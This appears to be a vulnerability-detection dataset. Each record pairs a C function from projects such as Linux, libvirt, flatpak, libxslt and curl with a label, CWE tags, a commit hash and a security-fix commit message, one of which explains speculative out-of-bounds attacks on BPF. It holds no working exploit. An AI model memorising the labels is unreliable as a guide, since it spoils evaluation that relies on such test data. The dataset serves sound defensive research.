correctly check return value of X509_check_host CVE-2020-7041 incorrect use of X509_check_host (regarding return value) is fixed with this commit. The flaw came in with #242 and prevented proper host name verification when openssl >= 1.0.2 was in use since openfortivpn 1.7.0.
asmlinkage long compat_sys_statfs64(const char __user *path, compat_size_t sz, struct compat_statfs64 __user *buf) { struct nameidata nd; int error; if (sz != sizeof(*buf)) return -EINVAL; error = user_path_walk(path, &nd); if (!error) { struct kstatfs tmp; error = vfs_statfs(nd.dentry, &tmp); if (!error) error = put_compat_statfs64(buf, &tmp); path_release(&nd); } return error; }
0
[]
linux-2.6
822191a2fa1584a29c3224ab328507adcaeac1ab
256,104,685,076,993,450,000,000,000,000,000,000,000
18
[PATCH] skip data conversion in compat_sys_mount when data_page is NULL OpenVZ Linux kernel team has found a problem with mounting in compat mode. Simple command "mount -t smbfs ..." on Fedora Core 5 distro in 32-bit mode leads to oops: Unable to handle kernel NULL pointer dereference at 0000000000000000 RIP: compat_sys_mount+0xd6/0x290 Process mount (pid: 14656, veid=300, threadinfo ffff810034d30000, task ffff810034c86bc0) Call Trace: ia32_sysret+0x0/0xa The problem is that data_page pointer can be NULL, so we should skip data conversion in this case. Signed-off-by: Andrey Mirkin <[email protected]> Cc: <[email protected]> Signed-off-by: Andrew Morton <[email protected]> Signed-off-by: Linus Torvalds <[email protected]>
virDomainStorageNetworkParseHost(xmlNodePtr hostnode, virStorageNetHostDefPtr host) { int ret = -1; g_autofree char *transport = NULL; g_autofree char *port = NULL; memset(host, 0, sizeof(*host)); host->transport = VIR_STORAGE_NET_HOST_TRANS_TCP; /* transport can be tcp (default), unix or rdma. */ if ((transport = virXMLPropString(hostnode, "transport"))) { host->transport = virStorageNetHostTransportTypeFromString(transport); if (host->transport < 0) { virReportError(VIR_ERR_CONFIG_UNSUPPORTED, _("unknown protocol transport type '%s'"), transport); goto cleanup; } } host->socket = virXMLPropString(hostnode, "socket"); if (host->transport == VIR_STORAGE_NET_HOST_TRANS_UNIX && host->socket == NULL) { virReportError(VIR_ERR_XML_ERROR, "%s", _("missing socket for unix transport")); goto cleanup; } if (host->transport != VIR_STORAGE_NET_HOST_TRANS_UNIX && host->socket != NULL) { virReportError(VIR_ERR_XML_ERROR, _("transport '%s' does not support " "socket attribute"), transport); goto cleanup; } if (host->transport != VIR_STORAGE_NET_HOST_TRANS_UNIX) { if (!(host->name = virXMLPropString(hostnode, "name"))) { virReportError(VIR_ERR_XML_ERROR, "%s", _("missing name for host")); goto cleanup; } if ((port = virXMLPropString(hostnode, "port"))) { if (virStringParsePort(port, &host->port) < 0) goto cleanup; } } ret = 0; cleanup: if (ret < 0) virStorageNetHostDefClear(host); return ret; }
0
[ "CWE-212" ]
libvirt
a5b064bf4b17a9884d7d361733737fb614ad8979
262,936,950,108,598,830,000,000,000,000,000,000,000
59
conf: Don't format http cookies unless VIR_DOMAIN_DEF_FORMAT_SECURE is used Starting with 3b076391befc3fe72deb0c244ac6c2b4c100b410 (v6.1.0-122-g3b076391be) we support http cookies. Since they may contain somewhat sensitive information we should not format them into the XML unless VIR_DOMAIN_DEF_FORMAT_SECURE is asserted. Reported-by: Han Han <[email protected]> Signed-off-by: Peter Krempa <[email protected]> Reviewed-by: Erik Skultety <[email protected]>
Item_args::Item_args(THD *thd, const Item_args *other) :arg_count(other->arg_count) { if (arg_count <= 2) { args= tmp_arg; } else if (!(args= (Item**) thd->alloc(sizeof(Item*) * arg_count))) { arg_count= 0; return; } if (arg_count) memcpy(args, other->args, sizeof(Item*) * arg_count); }
0
[ "CWE-120" ]
server
eca207c46293bc72dd8d0d5622153fab4d3fccf1
205,056,669,268,167,170,000,000,000,000,000,000,000
15
MDEV-25317 Assertion `scale <= precision' failed in decimal_bin_size And Assertion `scale >= 0 && precision > 0 && scale <= precision' failed in decimal_bin_size_inline/decimal_bin_size. Precision should be kept below DECIMAL_MAX_SCALE for computations. It can be bigger in Item_decimal. I'd fix this too but it changes the existing behaviour so problemmatic to ix.
add_monitor_path_args (gboolean use_session_helper, FlatpakBwrap *bwrap) { g_autoptr(AutoFlatpakSessionHelper) session_helper = NULL; g_autofree char *monitor_path = NULL; g_autofree char *pkcs11_socket_path = NULL; g_autoptr(GVariant) session_data = NULL; if (use_session_helper) { session_helper = flatpak_session_helper_proxy_new_for_bus_sync (G_BUS_TYPE_SESSION, G_DBUS_PROXY_FLAGS_DO_NOT_LOAD_PROPERTIES | G_DBUS_PROXY_FLAGS_DO_NOT_CONNECT_SIGNALS, "org.freedesktop.Flatpak", "/org/freedesktop/Flatpak/SessionHelper", NULL, NULL); } if (session_helper && flatpak_session_helper_call_request_session_sync (session_helper, &session_data, NULL, NULL)) { if (g_variant_lookup (session_data, "path", "s", &monitor_path)) flatpak_bwrap_add_args (bwrap, "--ro-bind", monitor_path, "/run/host/monitor", "--symlink", "/run/host/monitor/resolv.conf", "/etc/resolv.conf", "--symlink", "/run/host/monitor/host.conf", "/etc/host.conf", "--symlink", "/run/host/monitor/hosts", "/etc/hosts", NULL); if (g_variant_lookup (session_data, "pkcs11-socket", "s", &pkcs11_socket_path)) { g_autofree char *sandbox_pkcs11_socket_path = g_strdup_printf ("/run/user/%d/p11-kit/pkcs11", getuid ()); const char *trusted_module_contents = "# This overrides the runtime p11-kit-trusted module with a client one talking to the trust module on the host\n" "module: p11-kit-client.so\n"; if (flatpak_bwrap_add_args_data (bwrap, "p11-kit-trust.module", trusted_module_contents, -1, "/etc/pkcs11/modules/p11-kit-trust.module", NULL)) { flatpak_bwrap_add_args (bwrap, "--ro-bind", pkcs11_socket_path, sandbox_pkcs11_socket_path, NULL); flatpak_bwrap_unset_env (bwrap, "P11_KIT_SERVER_ADDRESS"); } } } else { if (g_file_test ("/etc/resolv.conf", G_FILE_TEST_EXISTS)) flatpak_bwrap_add_args (bwrap, "--ro-bind", "/etc/resolv.conf", "/etc/resolv.conf", NULL); if (g_file_test ("/etc/host.conf", G_FILE_TEST_EXISTS)) flatpak_bwrap_add_args (bwrap, "--ro-bind", "/etc/host.conf", "/etc/host.conf", NULL); if (g_file_test ("/etc/hosts", G_FILE_TEST_EXISTS)) flatpak_bwrap_add_args (bwrap, "--ro-bind", "/etc/hosts", "/etc/hosts", NULL); } }
0
[ "CWE-94", "CWE-74" ]
flatpak
6d1773d2a54dde9b099043f07a2094a4f1c2f486
15,201,673,145,906,157,000,000,000,000,000,000,000
65
run: Convert all environment variables into bwrap arguments This avoids some of them being filtered out by a setuid bwrap. It also means that if they came from an untrusted source, they cannot be used to inject arbitrary code into a non-setuid bwrap via mechanisms like LD_PRELOAD. Because they get bundled into a memfd or temporary file, they do not actually appear in argv, ensuring that they remain inaccessible to processes running under a different uid (which is important if their values are tokens or other secrets). Signed-off-by: Simon McVittie <[email protected]> Part-of: https://github.com/flatpak/flatpak/security/advisories/GHSA-4ppf-fxf6-vxg2
static struct bpf_reg_state *reg_state(struct bpf_verifier_env *env, int regno) { return cur_regs(env) + regno; }
0
[ "CWE-703", "CWE-189" ]
linux
979d63d50c0c0f7bc537bf821e056cc9fe5abd38
9,567,876,609,951,029,000,000,000,000,000,000,000
4
bpf: prevent out of bounds speculation on pointer arithmetic Jann reported that the original commit back in b2157399cc98 ("bpf: prevent out-of-bounds speculation") was not sufficient to stop CPU from speculating out of bounds memory access: While b2157399cc98 only focussed on masking array map access for unprivileged users for tail calls and data access such that the user provided index gets sanitized from BPF program and syscall side, there is still a more generic form affected from BPF programs that applies to most maps that hold user data in relation to dynamic map access when dealing with unknown scalars or "slow" known scalars as access offset, for example: - Load a map value pointer into R6 - Load an index into R7 - Do a slow computation (e.g. with a memory dependency) that loads a limit into R8 (e.g. load the limit from a map for high latency, then mask it to make the verifier happy) - Exit if R7 >= R8 (mispredicted branch) - Load R0 = R6[R7] - Load R0 = R6[R0] For unknown scalars there are two options in the BPF verifier where we could derive knowledge from in order to guarantee safe access to the memory: i) While </>/<=/>= variants won't allow to derive any lower or upper bounds from the unknown scalar where it would be safe to add it to the map value pointer, it is possible through ==/!= test however. ii) another option is to transform the unknown scalar into a known scalar, for example, through ALU ops combination such as R &= <imm> followed by R |= <imm> or any similar combination where the original information from the unknown scalar would be destroyed entirely leaving R with a constant. The initial slow load still precedes the latter ALU ops on that register, so the CPU executes speculatively from that point. Once we have the known scalar, any compare operation would work then. A third option only involving registers with known scalars could be crafted as described in [0] where a CPU port (e.g. Slow Int unit) would be filled with many dependent computations such that the subsequent condition depending on its outcome has to wait for evaluation on its execution port and thereby executing speculatively if the speculated code can be scheduled on a different execution port, or any other form of mistraining as described in [1], for example. Given this is not limited to only unknown scalars, not only map but also stack access is affected since both is accessible for unprivileged users and could potentially be used for out of bounds access under speculation. In order to prevent any of these cases, the verifier is now sanitizing pointer arithmetic on the offset such that any out of bounds speculation would be masked in a way where the pointer arithmetic result in the destination register will stay unchanged, meaning offset masked into zero similar as in array_index_nospec() case. With regards to implementation, there are three options that were considered: i) new insn for sanitation, ii) push/pop insn and sanitation as inlined BPF, iii) reuse of ax register and sanitation as inlined BPF. Option i) has the downside that we end up using from reserved bits in the opcode space, but also that we would require each JIT to emit masking as native arch opcodes meaning mitigation would have slow adoption till everyone implements it eventually which is counter-productive. Option ii) and iii) have both in common that a temporary register is needed in order to implement the sanitation as inlined BPF since we are not allowed to modify the source register. While a push / pop insn in ii) would be useful to have in any case, it requires once again that every JIT needs to implement it first. While possible, amount of changes needed would also be unsuitable for a -stable patch. Therefore, the path which has fewer changes, less BPF instructions for the mitigation and does not require anything to be changed in the JITs is option iii) which this work is pursuing. The ax register is already mapped to a register in all JITs (modulo arm32 where it's mapped to stack as various other BPF registers there) and used in constant blinding for JITs-only so far. It can be reused for verifier rewrites under certain constraints. The interpreter's tmp "register" has therefore been remapped into extending the register set with hidden ax register and reusing that for a number of instructions that needed the prior temporary variable internally (e.g. div, mod). This allows for zero increase in stack space usage in the interpreter, and enables (restricted) generic use in rewrites otherwise as long as such a patchlet does not make use of these instructions. The sanitation mask is dynamic and relative to the offset the map value or stack pointer currently holds. There are various cases that need to be taken under consideration for the masking, e.g. such operation could look as follows: ptr += val or val += ptr or ptr -= val. Thus, the value to be sanitized could reside either in source or in destination register, and the limit is different depending on whether the ALU op is addition or subtraction and depending on the current known and bounded offset. The limit is derived as follows: limit := max_value_size - (smin_value + off). For subtraction: limit := umax_value + off. This holds because we do not allow any pointer arithmetic that would temporarily go out of bounds or would have an unknown value with mixed signed bounds where it is unclear at verification time whether the actual runtime value would be either negative or positive. For example, we have a derived map pointer value with constant offset and bounded one, so limit based on smin_value works because the verifier requires that statically analyzed arithmetic on the pointer must be in bounds, and thus it checks if resulting smin_value + off and umax_value + off is still within map value bounds at time of arithmetic in addition to time of access. Similarly, for the case of stack access we derive the limit as follows: MAX_BPF_STACK + off for subtraction and -off for the case of addition where off := ptr_reg->off + ptr_reg->var_off.value. Subtraction is a special case for the masking which can be in form of ptr += -val, ptr -= -val, or ptr -= val. In the first two cases where we know that the value is negative, we need to temporarily negate the value in order to do the sanitation on a positive value where we later swap the ALU op, and restore original source register if the value was in source. The sanitation of pointer arithmetic alone is still not fully sufficient as is, since a scenario like the following could happen ... PTR += 0x1000 (e.g. K-based imm) PTR -= BIG_NUMBER_WITH_SLOW_COMPARISON PTR += 0x1000 PTR -= BIG_NUMBER_WITH_SLOW_COMPARISON [...] ... which under speculation could end up as ... PTR += 0x1000 PTR -= 0 [ truncated by mitigation ] PTR += 0x1000 PTR -= 0 [ truncated by mitigation ] [...] ... and therefore still access out of bounds. To prevent such case, the verifier is also analyzing safety for potential out of bounds access under speculative execution. Meaning, it is also simulating pointer access under truncation. We therefore "branch off" and push the current verification state after the ALU operation with known 0 to the verification stack for later analysis. Given the current path analysis succeeded it is likely that the one under speculation can be pruned. In any case, it is also subject to existing complexity limits and therefore anything beyond this point will be rejected. In terms of pruning, it needs to be ensured that the verification state from speculative execution simulation must never prune a non-speculative execution path, therefore, we mark verifier state accordingly at the time of push_stack(). If verifier detects out of bounds access under speculative execution from one of the possible paths that includes a truncation, it will reject such program. Given we mask every reg-based pointer arithmetic for unprivileged programs, we've been looking into how it could affect real-world programs in terms of size increase. As the majority of programs are targeted for privileged-only use case, we've unconditionally enabled masking (with its alu restrictions on top of it) for privileged programs for the sake of testing in order to check i) whether they get rejected in its current form, and ii) by how much the number of instructions and size will increase. We've tested this by using Katran, Cilium and test_l4lb from the kernel selftests. For Katran we've evaluated balancer_kern.o, Cilium bpf_lxc.o and an older test object bpf_lxc_opt_-DUNKNOWN.o and l4lb we've used test_l4lb.o as well as test_l4lb_noinline.o. We found that none of the programs got rejected by the verifier with this change, and that impact is rather minimal to none. balancer_kern.o had 13,904 bytes (1,738 insns) xlated and 7,797 bytes JITed before and after the change. Most complex program in bpf_lxc.o had 30,544 bytes (3,817 insns) xlated and 18,538 bytes JITed before and after and none of the other tail call programs in bpf_lxc.o had any changes either. For the older bpf_lxc_opt_-DUNKNOWN.o object we found a small increase from 20,616 bytes (2,576 insns) and 12,536 bytes JITed before to 20,664 bytes (2,582 insns) and 12,558 bytes JITed after the change. Other programs from that object file had similar small increase. Both test_l4lb.o had no change and remained at 6,544 bytes (817 insns) xlated and 3,401 bytes JITed and for test_l4lb_noinline.o constant at 5,080 bytes (634 insns) xlated and 3,313 bytes JITed. This can be explained in that LLVM typically optimizes stack based pointer arithmetic by using K-based operations and that use of dynamic map access is not overly frequent. However, in future we may decide to optimize the algorithm further under known guarantees from branch and value speculation. Latter seems also unclear in terms of prediction heuristics that today's CPUs apply as well as whether there could be collisions in e.g. the predictor's Value History/Pattern Table for triggering out of bounds access, thus masking is performed unconditionally at this point but could be subject to relaxation later on. We were generally also brainstorming various other approaches for mitigation, but the blocker was always lack of available registers at runtime and/or overhead for runtime tracking of limits belonging to a specific pointer. Thus, we found this to be minimally intrusive under given constraints. With that in place, a simple example with sanitized access on unprivileged load at post-verification time looks as follows: # bpftool prog dump xlated id 282 [...] 28: (79) r1 = *(u64 *)(r7 +0) 29: (79) r2 = *(u64 *)(r7 +8) 30: (57) r1 &= 15 31: (79) r3 = *(u64 *)(r0 +4608) 32: (57) r3 &= 1 33: (47) r3 |= 1 34: (2d) if r2 > r3 goto pc+19 35: (b4) (u32) r11 = (u32) 20479 | 36: (1f) r11 -= r2 | Dynamic sanitation for pointer 37: (4f) r11 |= r2 | arithmetic with registers 38: (87) r11 = -r11 | containing bounded or known 39: (c7) r11 s>>= 63 | scalars in order to prevent 40: (5f) r11 &= r2 | out of bounds speculation. 41: (0f) r4 += r11 | 42: (71) r4 = *(u8 *)(r4 +0) 43: (6f) r4 <<= r1 [...] For the case where the scalar sits in the destination register as opposed to the source register, the following code is emitted for the above example: [...] 16: (b4) (u32) r11 = (u32) 20479 17: (1f) r11 -= r2 18: (4f) r11 |= r2 19: (87) r11 = -r11 20: (c7) r11 s>>= 63 21: (5f) r2 &= r11 22: (0f) r2 += r0 23: (61) r0 = *(u32 *)(r2 +0) [...] JIT blinding example with non-conflicting use of r10: [...] d5: je 0x0000000000000106 _ d7: mov 0x0(%rax),%edi | da: mov $0xf153246,%r10d | Index load from map value and e0: xor $0xf153259,%r10 | (const blinded) mask with 0x1f. e7: and %r10,%rdi |_ ea: mov $0x2f,%r10d | f0: sub %rdi,%r10 | Sanitized addition. Both use r10 f3: or %rdi,%r10 | but do not interfere with each f6: neg %r10 | other. (Neither do these instructions f9: sar $0x3f,%r10 | interfere with the use of ax as temp fd: and %r10,%rdi | in interpreter.) 100: add %rax,%rdi |_ 103: mov 0x0(%rdi),%eax [...] Tested that it fixes Jann's reproducer, and also checked that test_verifier and test_progs suite with interpreter, JIT and JIT with hardening enabled on x86-64 and arm64 runs successfully. [0] Speculose: Analyzing the Security Implications of Speculative Execution in CPUs, Giorgi Maisuradze and Christian Rossow, https://arxiv.org/pdf/1801.04084.pdf [1] A Systematic Evaluation of Transient Execution Attacks and Defenses, Claudio Canella, Jo Van Bulck, Michael Schwarz, Moritz Lipp, Benjamin von Berg, Philipp Ortner, Frank Piessens, Dmitry Evtyushkin, Daniel Gruss, https://arxiv.org/pdf/1811.05441.pdf Fixes: b2157399cc98 ("bpf: prevent out-of-bounds speculation") Reported-by: Jann Horn <[email protected]> Signed-off-by: Daniel Borkmann <[email protected]> Acked-by: Alexei Starovoitov <[email protected]> Signed-off-by: Alexei Starovoitov <[email protected]>
template<typename t> const CImg<T>& _save_tiff(TIFF *tif, const unsigned int directory, const unsigned int z, const t& pixel_t, const unsigned int compression_type, const float *const voxel_size, const char *const description) const { if (is_empty() || !tif || pixel_t) return *this; const char *const filename = TIFFFileName(tif); uint32 rowsperstrip = (uint32)-1; uint16 spp = _spectrum, bpp = sizeof(t)*8, photometric; if (spp==3 || spp==4) photometric = PHOTOMETRIC_RGB; else photometric = PHOTOMETRIC_MINISBLACK; TIFFSetDirectory(tif,directory); TIFFSetField(tif,TIFFTAG_IMAGEWIDTH,_width); TIFFSetField(tif,TIFFTAG_IMAGELENGTH,_height); if (voxel_size) { const float vx = voxel_size[0], vy = voxel_size[1], vz = voxel_size[2]; TIFFSetField(tif,TIFFTAG_RESOLUTIONUNIT,RESUNIT_NONE); TIFFSetField(tif,TIFFTAG_XRESOLUTION,1.0f/vx); TIFFSetField(tif,TIFFTAG_YRESOLUTION,1.0f/vy); CImg<charT> s_description(256); cimg_snprintf(s_description,s_description._width,"VX=%g VY=%g VZ=%g spacing=%g",vx,vy,vz,vz); TIFFSetField(tif,TIFFTAG_IMAGEDESCRIPTION,s_description.data()); } if (description) TIFFSetField(tif,TIFFTAG_IMAGEDESCRIPTION,description); TIFFSetField(tif,TIFFTAG_ORIENTATION,ORIENTATION_TOPLEFT); TIFFSetField(tif,TIFFTAG_SAMPLESPERPIXEL,spp); if (cimg::type<t>::is_float()) TIFFSetField(tif,TIFFTAG_SAMPLEFORMAT,3); else if (cimg::type<t>::min()==0) TIFFSetField(tif,TIFFTAG_SAMPLEFORMAT,1); else TIFFSetField(tif,TIFFTAG_SAMPLEFORMAT,2); double valm, valM = max_min(valm); TIFFSetField(tif,TIFFTAG_SMINSAMPLEVALUE,valm); TIFFSetField(tif,TIFFTAG_SMAXSAMPLEVALUE,valM); TIFFSetField(tif,TIFFTAG_BITSPERSAMPLE,bpp); TIFFSetField(tif,TIFFTAG_PLANARCONFIG,PLANARCONFIG_CONTIG); TIFFSetField(tif,TIFFTAG_PHOTOMETRIC,photometric); TIFFSetField(tif,TIFFTAG_COMPRESSION,compression_type==2?COMPRESSION_JPEG: compression_type==1?COMPRESSION_LZW:COMPRESSION_NONE); rowsperstrip = TIFFDefaultStripSize(tif,rowsperstrip); TIFFSetField(tif,TIFFTAG_ROWSPERSTRIP,rowsperstrip); TIFFSetField(tif,TIFFTAG_FILLORDER,FILLORDER_MSB2LSB); TIFFSetField(tif,TIFFTAG_SOFTWARE,"CImg"); t *const buf = (t*)_TIFFmalloc(TIFFStripSize(tif)); if (buf) { for (unsigned int row = 0; row<_height; row+=rowsperstrip) { uint32 nrow = (row + rowsperstrip>_height?_height - row:rowsperstrip); tstrip_t strip = TIFFComputeStrip(tif,row,0); tsize_t i = 0; for (unsigned int rr = 0; rr<nrow; ++rr) for (unsigned int cc = 0; cc<_width; ++cc) for (unsigned int vv = 0; vv<spp; ++vv) buf[i++] = (t)(*this)(cc,row + rr,z,vv); if (TIFFWriteEncodedStrip(tif,strip,buf,i*sizeof(t))<0) throw CImgIOException(_cimg_instance "save_tiff(): Invalid strip writing when saving file '%s'.", cimg_instance, filename?filename:"(FILE*)"); } _TIFFfree(buf); } TIFFWriteDirectory(tif); return *this;
0
[ "CWE-125" ]
CImg
10af1e8c1ad2a58a0a3342a856bae63e8f257abb
120,279,614,116,920,270,000,000,000,000,000,000,000
61
Fix other issues in 'CImg<T>::load_bmp()'.
xsltLoadStylesheetPI(xmlDocPtr doc) { xmlNodePtr child; xsltStylesheetPtr ret = NULL; xmlChar *href = NULL; xmlURIPtr URI; xsltInitGlobals(); if (doc == NULL) return(NULL); /* * Find the text/xml stylesheet PI id any before the root */ child = doc->children; while ((child != NULL) && (child->type != XML_ELEMENT_NODE)) { if ((child->type == XML_PI_NODE) && (xmlStrEqual(child->name, BAD_CAST "xml-stylesheet"))) { href = xsltParseStylesheetPI(child->content); if (href != NULL) break; } child = child->next; } /* * If found check the href to select processing */ if (href != NULL) { #ifdef WITH_XSLT_DEBUG_PARSING xsltGenericDebug(xsltGenericDebugContext, "xsltLoadStylesheetPI : found PI href=%s\n", href); #endif URI = xmlParseURI((const char *) href); if (URI == NULL) { xsltTransformError(NULL, NULL, child, "xml-stylesheet : href %s is not valid\n", href); xmlFree(href); return(NULL); } if ((URI->fragment != NULL) && (URI->scheme == NULL) && (URI->opaque == NULL) && (URI->authority == NULL) && (URI->server == NULL) && (URI->user == NULL) && (URI->path == NULL) && (URI->query == NULL)) { xmlAttrPtr ID; #ifdef WITH_XSLT_DEBUG_PARSING xsltGenericDebug(xsltGenericDebugContext, "xsltLoadStylesheetPI : Reference to ID %s\n", href); #endif if (URI->fragment[0] == '#') ID = xmlGetID(doc, (const xmlChar *) &(URI->fragment[1])); else ID = xmlGetID(doc, (const xmlChar *) URI->fragment); if (ID == NULL) { xsltTransformError(NULL, NULL, child, "xml-stylesheet : no ID %s found\n", URI->fragment); } else { xmlDocPtr fake; xmlNodePtr subtree, newtree; xmlNsPtr ns; #ifdef WITH_XSLT_DEBUG xsltGenericDebug(xsltGenericDebugContext, "creating new document from %s for embedded stylesheet\n", doc->URL); #endif /* * move the subtree in a new document passed to * the stylesheet analyzer */ subtree = ID->parent; fake = xmlNewDoc(NULL); if (fake != NULL) { /* * Should the dictionary still be shared even though * the nodes are being copied rather than moved? */ fake->dict = doc->dict; xmlDictReference(doc->dict); #ifdef WITH_XSLT_DEBUG xsltGenericDebug(xsltGenericDebugContext, "reusing dictionary from %s for embedded stylesheet\n", doc->URL); #endif newtree = xmlDocCopyNode(subtree, fake, 1); fake->URL = xmlNodeGetBase(doc, subtree->parent); #ifdef WITH_XSLT_DEBUG xsltGenericDebug(xsltGenericDebugContext, "set base URI for embedded stylesheet as %s\n", fake->URL); #endif /* * Add all namespaces in scope of embedded stylesheet to * root element of newly created stylesheet document */ while ((subtree = subtree->parent) != (xmlNodePtr)doc) { for (ns = subtree->ns; ns; ns = ns->next) { xmlNewNs(newtree, ns->href, ns->prefix); } } xmlAddChild((xmlNodePtr)fake, newtree); ret = xsltParseStylesheetDoc(fake); if (ret == NULL) xmlFreeDoc(fake); } } } else { xmlChar *URL, *base; /* * Reference to an external stylesheet */ base = xmlNodeGetBase(doc, (xmlNodePtr) doc); URL = xmlBuildURI(href, base); if (URL != NULL) { #ifdef WITH_XSLT_DEBUG_PARSING xsltGenericDebug(xsltGenericDebugContext, "xsltLoadStylesheetPI : fetching %s\n", URL); #endif ret = xsltParseStylesheetFile(URL); xmlFree(URL); } else { #ifdef WITH_XSLT_DEBUG_PARSING xsltGenericDebug(xsltGenericDebugContext, "xsltLoadStylesheetPI : fetching %s\n", href); #endif ret = xsltParseStylesheetFile(href); } if (base != NULL) xmlFree(base); } xmlFreeURI(URI); xmlFree(href); } return(ret); }
0
[]
libxslt
e03553605b45c88f0b4b2980adfbbb8f6fca2fd6
30,785,497,082,675,580,000,000,000,000,000,000,000
142
Fix security framework bypass xsltCheckRead and xsltCheckWrite return -1 in case of error but callers don't check for this condition and allow access. With a specially crafted URL, xsltCheckRead could be tricked into returning an error because of a supposedly invalid URL that would still be loaded succesfully later on. Fixes #12. Thanks to Felix Wilhelm for the report.
static inline void cma_set_ip_ver(struct cma_hdr *hdr, u8 ip_ver) { hdr->ip_version = (ip_ver << 4) | (hdr->ip_version & 0xF); }
0
[ "CWE-416" ]
linux
bc0bdc5afaa740d782fbf936aaeebd65e5c2921d
13,050,008,327,612,447,000,000,000,000,000,000,000
4
RDMA/cma: Do not change route.addr.src_addr.ss_family If the state is not idle then rdma_bind_addr() will immediately fail and no change to global state should happen. For instance if the state is already RDMA_CM_LISTEN then this will corrupt the src_addr and would cause the test in cma_cancel_operation(): if (cma_any_addr(cma_src_addr(id_priv)) && !id_priv->cma_dev) To view a mangled src_addr, eg with a IPv6 loopback address but an IPv4 family, failing the test. This would manifest as this trace from syzkaller: BUG: KASAN: use-after-free in __list_add_valid+0x93/0xa0 lib/list_debug.c:26 Read of size 8 at addr ffff8881546491e0 by task syz-executor.1/32204 CPU: 1 PID: 32204 Comm: syz-executor.1 Not tainted 5.12.0-rc8-syzkaller #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011 Call Trace: __dump_stack lib/dump_stack.c:79 [inline] dump_stack+0x141/0x1d7 lib/dump_stack.c:120 print_address_description.constprop.0.cold+0x5b/0x2f8 mm/kasan/report.c:232 __kasan_report mm/kasan/report.c:399 [inline] kasan_report.cold+0x7c/0xd8 mm/kasan/report.c:416 __list_add_valid+0x93/0xa0 lib/list_debug.c:26 __list_add include/linux/list.h:67 [inline] list_add_tail include/linux/list.h:100 [inline] cma_listen_on_all drivers/infiniband/core/cma.c:2557 [inline] rdma_listen+0x787/0xe00 drivers/infiniband/core/cma.c:3751 ucma_listen+0x16a/0x210 drivers/infiniband/core/ucma.c:1102 ucma_write+0x259/0x350 drivers/infiniband/core/ucma.c:1732 vfs_write+0x28e/0xa30 fs/read_write.c:603 ksys_write+0x1ee/0x250 fs/read_write.c:658 do_syscall_64+0x2d/0x70 arch/x86/entry/common.c:46 entry_SYSCALL_64_after_hwframe+0x44/0xae Which is indicating that an rdma_id_private was destroyed without doing cma_cancel_listens(). Instead of trying to re-use the src_addr memory to indirectly create an any address build one explicitly on the stack and bind to that as any other normal flow would do. Link: https://lore.kernel.org/r/[email protected] Cc: [email protected] Fixes: 732d41c545bb ("RDMA/cma: Make the locking for automatic state transition more clear") Reported-by: [email protected] Tested-by: Hao Sun <[email protected]> Reviewed-by: Leon Romanovsky <[email protected]> Signed-off-by: Jason Gunthorpe <[email protected]>
static struct Curl_sh_entry *sh_addentry(struct Curl_hash *sh, curl_socket_t s) { struct Curl_sh_entry *there = sh_getentry(sh, s); struct Curl_sh_entry *check; if(there) { /* it is present, return fine */ return there; } /* not present, add it */ check = calloc(1, sizeof(struct Curl_sh_entry)); if(!check) return NULL; /* major failure */ if(Curl_hash_init(&check->transfers, TRHASH_SIZE, trhash, trhash_compare, trhash_dtor)) { free(check); return NULL; } /* make/add new hash entry */ if(!Curl_hash_add(sh, (char *)&s, sizeof(curl_socket_t), check)) { Curl_hash_destroy(&check->transfers); free(check); return NULL; /* major failure */ } return check; /* things are good in sockhash land */ }
0
[ "CWE-416", "CWE-295" ]
curl
7f4a9a9b2a49547eae24d2e19bc5c346e9026479
246,698,233,446,122,800,000,000,000,000,000,000,000
31
openssl: associate/detach the transfer from connection CVE-2021-22901 Bug: https://curl.se/docs/CVE-2021-22901.html
pdf14_disable_device(gx_device * dev) { gx_device_forward * pdev = (gx_device_forward *)dev; if_debug0m('v', dev->memory, "[v]pdf14_disable_device\n"); dev->color_info = pdev->target->color_info; pdf14_forward_device_procs(dev); set_dev_proc(dev, create_compositor, pdf14_forward_create_compositor); return 0; }
0
[ "CWE-416" ]
ghostpdl
90fd0c7ca3efc1ddff64a86f4104b13b3ac969eb
130,330,113,523,750,180,000,000,000,000,000,000,000
10
Bug 697456. Dont create new ctx when pdf14 device reenabled This bug had yet another weird case where the user created a file that pushed the pdf14 device twice. We were in that case, creating a new ctx and blowing away the original one with out proper clean up. To avoid, only create a new one when we need it.
pk11_get_best_token(pk11_optype_t optype) { pk11_token_t *token = NULL; switch (optype) { case OP_RAND: token = rand_token; break; case OP_RSA: token = best_rsa_token; break; case OP_DSA: token = best_dsa_token; break; case OP_DH: token = best_dh_token; break; case OP_DIGEST: token = digest_token; break; case OP_EC: token = best_ec_token; break; case OP_GOST: token = best_gost_token; break; case OP_AES: token = aes_token; break; default: break; } if (token == NULL) return (0); return (token->slotid); }
0
[ "CWE-617" ]
bind9
8d807cc21655eaa6e6a08afafeec3682c0f3f2ab
267,961,781,494,777,500,000,000,000,000,000,000,000
35
Fix crash in pk11_numbits() when native-pkcs11 is used When pk11_numbits() is passed a user provided input that contains all zeroes (via crafted DNS message), it would crash with assertion failure. Fix that by properly handling such input.
static int property_get_smack_process_label( sd_bus *bus, const char *path, const char *interface, const char *property, sd_bus_message *reply, void *userdata, sd_bus_error *error) { ExecContext *c = userdata; assert(bus); assert(reply); assert(c); return sd_bus_message_append(reply, "(bs)", c->smack_process_label_ignore, c->smack_process_label); }
0
[ "CWE-269" ]
systemd
f69567cbe26d09eac9d387c0be0fc32c65a83ada
96,861,103,759,408,600,000,000,000,000,000,000,000
17
core: expose SUID/SGID restriction as new unit setting RestrictSUIDSGID=
const char *gf_m4v_get_profile_name(u8 video_pl) { u32 i, count = GF_ARRAY_LENGTH(M4VProfiles); for (i=0; i<count; i++) { if ((u32)video_pl == M4VProfiles[i].value) return M4VProfiles[i].name; } return "ISO Reserved Profile"; }
0
[ "CWE-190", "CWE-787" ]
gpac
51cdb67ff7c5f1242ac58c5aa603ceaf1793b788
95,069,702,629,232,000,000,000,000,000,000,000,000
9
add safety in avc/hevc/vvc sps/pps/vps ID check - cf #1720 #1721 #1722
